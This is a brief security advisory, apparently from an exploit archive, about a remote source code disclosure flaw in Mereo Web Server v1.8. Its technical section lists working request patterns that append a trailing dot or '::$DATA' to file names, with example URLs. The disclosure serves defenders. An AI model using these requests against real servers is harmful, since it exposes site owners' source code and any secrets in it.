Mereo web server version 1.8 suffers from a remote source code disclosure vulnerability.
117e0e5e88a43e22c430c1d95e9d478b29c66818ff7b2f283b2628cd14a72bf8
#################################################################################
#
# Mereo Web Server v1.8 Multiple Remote Source Code Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
#
#################################################################################
- Description -
Mereo Web Server v1.8 is a Windows based HTTP server. This is the latest version of
the application available.
Mereo is vulnerable to remote arbitrary source code disclosure by the following means.
- Technical Details -
http://[ webserver IP]/[ file ][.]
http://[ webserver IP]/[ file ][::$DATA]
http://172.16.2.101/index.html.
http://172.16.2.101/index.html::$DATA